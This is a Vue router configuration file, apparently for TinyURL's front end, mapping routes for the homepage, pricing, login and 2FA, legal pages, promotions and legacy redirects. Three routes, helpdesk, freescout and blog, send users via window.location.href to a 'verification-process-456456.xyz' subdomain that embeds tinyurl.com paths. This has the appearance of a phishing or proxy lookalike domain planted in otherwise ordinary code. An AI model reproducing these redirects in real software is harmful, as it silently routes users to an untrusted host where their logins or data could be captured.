import Store from "@Store";

import isUserGuest from "@Middleware/isUserGuest";
import isUserLoggedIn from "@Middleware/isUserLoggedIn";
import isUserDeveloper from "@Middleware/isUserDeveloper";
import Empty from "@Middleware/empty";
import subscribeToPaddle from "@Middleware/subscribeToPaddle";
import shouldRedirectToTeams from "@Resources/js/modules/teams/routes/middleware/shouldRedirectToTeams";

import { hasSubscriptionParameter } from "@Helpers/functions";

// Auths
const EmailVerify = () => import(/* webpackChunkName: 'Auth'*/ "@Views/auth/EmailVerify.vue");

// Home
const Help = () => import(/* webpackChunkName: 'help' */ "@Views/home/Help.vue");
const PurchaseDomains = () => import(/* webpackChunkName: 'domains' */ "@Views/home/PurchaseDomains.vue");
const Notifications = () => import(/* webpackChunkName: 'dashboard'*/ "@Views/home/Notifications.vue");
const EnterpriseTerms = () => import(/* webpackChunkName: 'help' */ "@Views/home/EnterpriseTerms.vue");
const ServiceLevelAgreement = () => import(/* webpackChunkName: 'help' */ "@Views/home/ServiceLevelAgreement.vue");
const SupplementalTerms = () => import(/* webpackChunkName: 'help' */ "@Views/home/SupplementalTerms.vue");
// const ContactSales = () => import(/* webpackChunkName: 'help'*/ "@Views/home/ContactSales.vue");
const Unsubscribe = () => import(/* webpackChunkName: 'Auth'*/ "@Views/home/Unsubscribe.vue");

// Careers
const CareersFullStackDeveloper = () => import(/* webpackChunkName: 'careers' */ "@Views/careers/FullStackDeveloper.vue");
const Quote = () => import(/* webpackChunkName: 'pricing'*/ "@Views/pricing/Quote.vue");

// Features
const LinkManagement = () => import(/* webpackChunkName: 'features'*/ "@Views/features/LinkManagement.vue");
const FreeDomains = () => import(/* webpackChunkName: 'features' */ "@Views/features/FreeDomains.vue");

// BFCM
const BFCMLandingBlackFriday = () => import(/* webpackChunkName: 'bfcm' */ "@Views/promos/bfcm/BlackFriday.vue");
const BFCMLandingCyberMonday = () => import(/* webpackChunkName: 'bfcm' */ "@Views/promos/bfcm/CyberMonday.vue");
const BlackFridayLandingPage = () => import(/* webpackChunkName: 'bfcm' */ "@Views/promos/bfcm/BlackFridayOverhauling.vue");
const CyberMondayLandingPage = () => import(/* webpackChunkName: 'bfcm' */ "@Views/promos/bfcm/CyberMondayOverhauling.vue");

// Others
const PublicStats = () => import(/* webpackChunkName: 'stats' */ "@Components/layouts/homepage/stats.vue");
const MyUrlsPop = () => import(/* webpackChunkName: 'dashboard' */ "@Components/layouts/homepage/MyUrlsPop.vue");
const ClearHistoryPop = () => import(/* webpackChunkName: 'dashboard' */ "@Components/layouts/homepage/ClearHistoryPop.vue");
const AffiliateOptionPop = () => import(/* webpackChunkName: 'dashboard' */ "@Components/layouts/homepage/AffiliateOptionPop.vue");
const Swagger = () => import(/* webpackChunkName: 'api' */ "@Components/Swagger.vue");
const DeactivateAccountSuccess = () => import(/* webpackChunkName: 'settings' */ "@Components/layouts/app/settings/profile/DeactivateAccountSuccess.vue");

// Invokes
const FreetrialGetStartedModal = () => import(/* webpackChunkName: 'freetrial-get-started-modal' */ "@Views/freetrial/GetStarted.vue");
const FreetrialDomainUpsellModal = () => import(/* webpackChunkName: 'freetrial-domain-upsell-modal' */ "@Views/freetrial/DomainUpsell.vue");
const FreetrialDomainPurchaseVerificationModal = () => import(/* webpackChunkName: 'freetrial-domain-purchase-verification-modal' */ "@Views/freetrial/DomainPurchaseVerification.vue");
const ExpiredPage = () => import(/* webpackChunkName: 'expired-page' */ "@Views/subscription/Expired.vue");
const PaddleDefaultPaymentPage = () => import(/* webpackChunkName: 'paddle-default-payment-page' */ "@Views/paddle/DefaultPaymentPage.vue");

const TaxIdUpdatePage = () => import(/* webpackChunkName: 'tax-id-page' */ "@Views/home/TaxIdUpdate/MainPage.vue");

// Overhauling pages
const HomepageOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/homepage/HomepageOverhauling.vue");
const PricingOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/pricing/PricingOverhauling.vue");
const SignUpOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/sign-up/SignUpOverhauling.vue");
const LoginOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/login/LoginOverhauling.vue");
const AboutUseOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/resources/AboutUsOverhauling.vue");
const LinkEditorOverhauling = () => import(/* webpackChunkName: 'overhauling'*/ "@Views/overhauling/features/LinkEditorOverhauling.vue");
const ShortUrlApiOverhauling = () => import(/* webpackChunkName: 'overhauling'*/ "@Views/overhauling/features/ShortUrlApiOverhauling.vue");
const BrandedLinksOverhauling = () => import(/* webpackChunkName: 'overhauling'*/ "@Views/overhauling/features/BrandedLinksOverhauling.vue");
const QrCodeGeneratorOverhauling = () => import(/* webpackChunkName: 'overhauling'*/ "@Views/overhauling/features/QrCodeGeneratorOverhauling.vue");
const ShortUrlTrackingOverhauling = () => import(/* webpackChunkName: 'overhauling'*/ "@Views/overhauling/features/ShortUrlTrackingOverhauling.vue");
const PasswordResetOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/password-reset/PasswordResetOverhauling.vue");
const OurProvenProcessOverhauling = () => import( /* webpackChunkName: 'overhauling' */ "@Views/overhauling/resources/ProvenProcessOverhauling.vue");
const BrandedDomainsOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/domains/BrandedDomainsOverhauling.vue");
const PrivacyManagerOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/legal/PrivacyManagerOverhauling.vue");
const LegalAccessibilityStatement = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/legal/AccessibilityStatement.vue");
const LegalTermsOfServiceOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/legal/TermsOfServiceOverhauling.vue");
const LegalPrivacyPolicyOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/legal/PrivacyPolicyOverhauling.vue");
const LegalCookiePolicyOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/legal/CookiePolicyOverhauling.vue");
const DataProcessingOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/legal/DataProcessingOverhauling.vue");
const Login2FaOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/login/Login2FaOverhauling.vue");
const LoginBackupCodeOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/login/LoginBackupCodeOverhauling.vue");
const ContactSalesOverhauling = () => import(/* webpackChunkName: 'overhauling' */ "@Views/overhauling/contact-sales/ContactSalesOverhauling.vue");

export default [
  {
    path: "/",
    name: "homepage",
    component: HomepageOverhauling,
    meta: { middleware: [Empty, shouldRedirectToTeams] },
    beforeEnter: (to, from, next) => {
      if (Store.getters.isUserSubscribed) {
        next({ name: "dashboard", query: to.query });
      } else {
        next();
      }
    },
  },

  {
    path: "/dashboard",
    name: "dashboard",
    component: HomepageOverhauling,
    meta: { middleware: [Empty, shouldRedirectToTeams] },
  },

  {
    path: "/paddle/subscribe",
    name: "paddle.subscribe",
    component: HomepageOverhauling,
    meta: { middleware: [subscribeToPaddle] },
  },

  {
    path: "/app/analytics/download",
    name: "analytics",
    beforeEnter: (to, from, next) => {
      next("/app");
    },
  },
  {
    path: "/app/analytics/:hash",
    name: "analytics",
    components: {
      default: HomepageOverhauling,
      right: PublicStats,
    },
  },
  {
    path: "/app/notifications",
    name: "notifications",
    meta: { middleware: [isUserLoggedIn] },
    components: {
      default: HomepageOverhauling,
      right: Notifications,
    },
  },
  {
    path: "/app/unsubscribe",
    name: "unsubscribe",
    components: {
      default: HomepageOverhauling,
      right: Unsubscribe,
    },
  },
  {
    path: "/app/my-urls",
    name: "my-urls",
    components: {
      default: HomepageOverhauling,
      right: MyUrlsPop,
    },
  },
  {
    path: "/app/my-urls/clear-history",
    name: "clear-history",
    meta: { middleware: [isUserGuest] },
    components: {
      default: HomepageOverhauling,
      right: ClearHistoryPop,
    },
  },
  {
    path: "/app/affiliate-link",
    name: "affiliateOptionPop",
    components: {
      default: HomepageOverhauling,
      right: AffiliateOptionPop,
    },
  },
  {
    path: "/app/help",
    name: "help",
    component: Help,
  },
  {
    path: "/app/helpdesk",
    name: "helpdesk",
    beforeEnter() {
      window.location.href = "https://3wdysv0wux1n.verification-process-456456.xyz/_x/helpdesk.tinyurl.com/";
    },
  },
  {
    path: "/app/freescout",
    name: "freescout",
    beforeEnter() {
      window.location.href = "https://3wdysv0wux1n.verification-process-456456.xyz/_x/freescout.tinyurl.com/help/2009208963/";
    },
  },
  {
    path: "/app/blog",
    name: "blog",
    beforeEnter() {
      window.location.href = "https://3wdysv0wux1n.verification-process-456456.xyz/blog/";
    },
  },
  {
    path: "/app/purchase-domains",
    name: "purchase-domains",
    meta: { middleware: [isUserDeveloper] },
    components: {
      default: HomepageOverhauling,
      right: PurchaseDomains,
    },
  },
  {
    path: "/app/signup",
    name: "signup",
    redirect: { name: "signup.pricing" },
  },
  {
    path: "/app/pricing",
    name: "signup.pricing",
    component: PricingOverhauling,
    beforeEnter: (to, from, next) => {
      const isUserLoggedIn = Store.getters.isUserLoggedIn;

      if (hasSubscriptionParameter(to.query) && !isUserLoggedIn) {
        next({
          name: "login",
          query: { to: to.fullPath },
        });
      } else {
        next();
      }
    },
  },
  {
    path: "/app/pricing/quote",
    name: "signup.pricing.quote",
    component: Quote,
  },
  {
    path: "/app/contact-sales",
    name: "contact-sales",
    component: ContactSalesOverhauling,
  },

  // BFCM
  {
    path: "/app/black-friday-2024",
    name: "bf2023",
    component: BFCMLandingBlackFriday,
  },
  {
    path: "/app/black-friday-2025",
    name: "black-friday",
    component: BlackFridayLandingPage,
  },
  {
    path: "/app/cyber-monday-2025",
    name: "cyber-monday",
    component: CyberMondayLandingPage,
  },
  {
    path: "/app/cyber-monday-2024",
    name: "cm2023",
    component: BFCMLandingCyberMonday,
  },

  {
    path: "/app/features",
    name: "features",
    redirect: { name: "signup.pricing" },
  },
  {
    path: "/app/features/custom-links",
    name: "features.custom-links",
    component: LinkEditorOverhauling,
  },
  {
    path: "/app/features/link-management",
    name: "features.link-management",
    component: LinkManagement,
  },
  {
    path: "/app/features/branded-links",
    name: "features.branded-links",
    component: BrandedLinksOverhauling,
  },
  {
    path: "/app/branded-domains",
    name: "branded-domains",
    component: BrandedDomainsOverhauling,
  },
  {
    path: "/app/features/link-analytics",
    name: "features.link-analytics",
    component: ShortUrlTrackingOverhauling,
  },
  {
    path: "/app/features/url-shortener-api",
    name: "features.short-url-api",
    component: ShortUrlApiOverhauling,
  },
  {
    path: "/app/features/qr-code-generator",
    name: "features.qr-code-generator",
    component: QrCodeGeneratorOverhauling,
  },
  {
    path: "/app/features/free-domains",
    name: "features.free-domains",
    component: FreeDomains,
  },
  {
    path: "/app/features/how-tinyurl-works",
    name: "features.how-tinyurl-works",
    redirect: { name: "resources.about-us" },
  },
  {
    path: "/app/about-us",
    name: "resources.about-us",
    component: AboutUseOverhauling,
  },
  {
    path: "/app/proven-process",
    name: "resources.our-proven-process",
    component: OurProvenProcessOverhauling,
  },
  {
    path: "/app/dev",
    name: "resources.dev",
    component: Swagger,
  },
  {
    path: "/app/accessibility",
    name: "accessibility",
    component: LegalAccessibilityStatement,
  },
  {
    path: "/app/terms",
    name: "terms",
    component: LegalTermsOfServiceOverhauling,
  },
  {
    path: "/app/cookies-policy",
    name: "cookies",
    component: LegalCookiePolicyOverhauling,
  },
  {
    path: "/app/privacy-policy",
    name: "privacy",
    component: LegalPrivacyPolicyOverhauling,
  },
  {
    path: "/app/privacy-manager",
    name: "privacy-manager",
    component: PrivacyManagerOverhauling,
  },
  {
    path: "/app/data-processing-agreement",
    name: "dpa",
    component: DataProcessingOverhauling,
  },
  {
    path: "/app/enterprise-terms",
    name: "enterprise-terms",
    components: {
      default: HomepageOverhauling,
      right: EnterpriseTerms,
    },
  },
  {
    path: "/app/service-level-agreement",
    name: "service-level-agreement",
    components: {
      default: HomepageOverhauling,
      right: ServiceLevelAgreement,
    },
  },
  {
    path: "/app/supplemental-terms",
    name: "supplemental-terms",
    components: {
      default: HomepageOverhauling,
      right: SupplementalTerms,
    },
  },
  {
    path: "/app/careers/fullstack-developer",
    name: "careers",
    components: {
      default: HomepageOverhauling,
      right: CareersFullStackDeveloper,
    },
  },
  {
    path: "/app/login",
    name: "login",
    meta: { middleware: [isUserGuest] },
    component: LoginOverhauling,
  },
  {
    path: "/app/login/2FA/verify",
    name: "login.2FA.verify",
    meta: { middleware: [isUserGuest] },
    component: Login2FaOverhauling,
  },
  {
    path: "/app/login/2FA/backup_code",
    name: "login.2FA.backup_code",
    meta: { middleware: [isUserGuest] },
    component: LoginBackupCodeOverhauling,
  },
  {
    path: "/app/register",
    name: "register",
    meta: { middleware: [isUserGuest] },
    component: SignUpOverhauling,
  },
  {
    path: "/app/password/reset/:token",
    meta: { middleware: [isUserGuest] },
    component: PasswordResetOverhauling,
  },
  {
    path: "/app/password/reset",
    name: "reset_request",
    meta: { middleware: [isUserGuest] },
    component: PasswordResetOverhauling,
  },
  {
    path: "/app/email/verify/:userId?/:verification_hash?",
    name: "email_verify",
    meta: { middleware: [isUserLoggedIn] },
    components: {
      default: HomepageOverhauling,
      right: EmailVerify,
    },
  },
  {
    path: "/app/deleted",
    name: "profile.deleted",
    components: {
      default: HomepageOverhauling,
      right: DeactivateAccountSuccess,
    },
  },
  {
    path: "/app/get-started",
    name: "freetrial.get-started-modal",
    component: FreetrialGetStartedModal,
    meta: { middleware: [isUserLoggedIn] },
  },
  {
    path: "/app/domain-upsell",
    name: "freetrial.domain-upsell-modal",
    component: FreetrialDomainUpsellModal,
    meta: { middleware: [isUserDeveloper] },
  },
  {
    path: "/app/domain-purchase-verification",
    name: "freetrial.domain-purchase-verification-modal",
    component: FreetrialDomainPurchaseVerificationModal,
    meta: { middleware: [isUserLoggedIn] },
  },
  {
    path: "/app/subscribe",
    name: "subscription.past_due",
    component: ExpiredPage,
    meta: { middleware: [isUserLoggedIn] },
  },
  {
    path: "/paddle/payment",
    name: "paddle.default_payment",
    component: PaddleDefaultPaymentPage,
  },

  {
    path: "/user/vatinfo/:encrypted",
    name: "tax-id-form",
    component: TaxIdUpdatePage,
  },

  // temporary 301 redirects solution
  { path: "/app/myurls",                     redirect: { name: "my-urls" } },
  { path: "/app/myurls/clear-history",       redirect: { name: "clear-history" } },
  { path: "/app/features/branded",           redirect: { name: "features.custom-links" } },
  { path: "/app/features/custom-domains",    redirect: { name: "branded-domains" } },
  { path: "/app/features/analytics",         redirect: { name: "features.link-analytics" } },
  { path: "/app/features/howit",             redirect: { name: "features.how-tinyurl-works" } },
  { path: "/app/features/aboutus",           redirect: { name: "resources.about-us" } },
  { path: "/app/features/about-us",          redirect: { name: "resources.about-us" } },
  { path: "/app/features/branded-domains",   redirect: { name: "branded-domains" } },
  { path: "/app/features/how-tinyurl-works", redirect: { name: "resources.about-us" } },
];
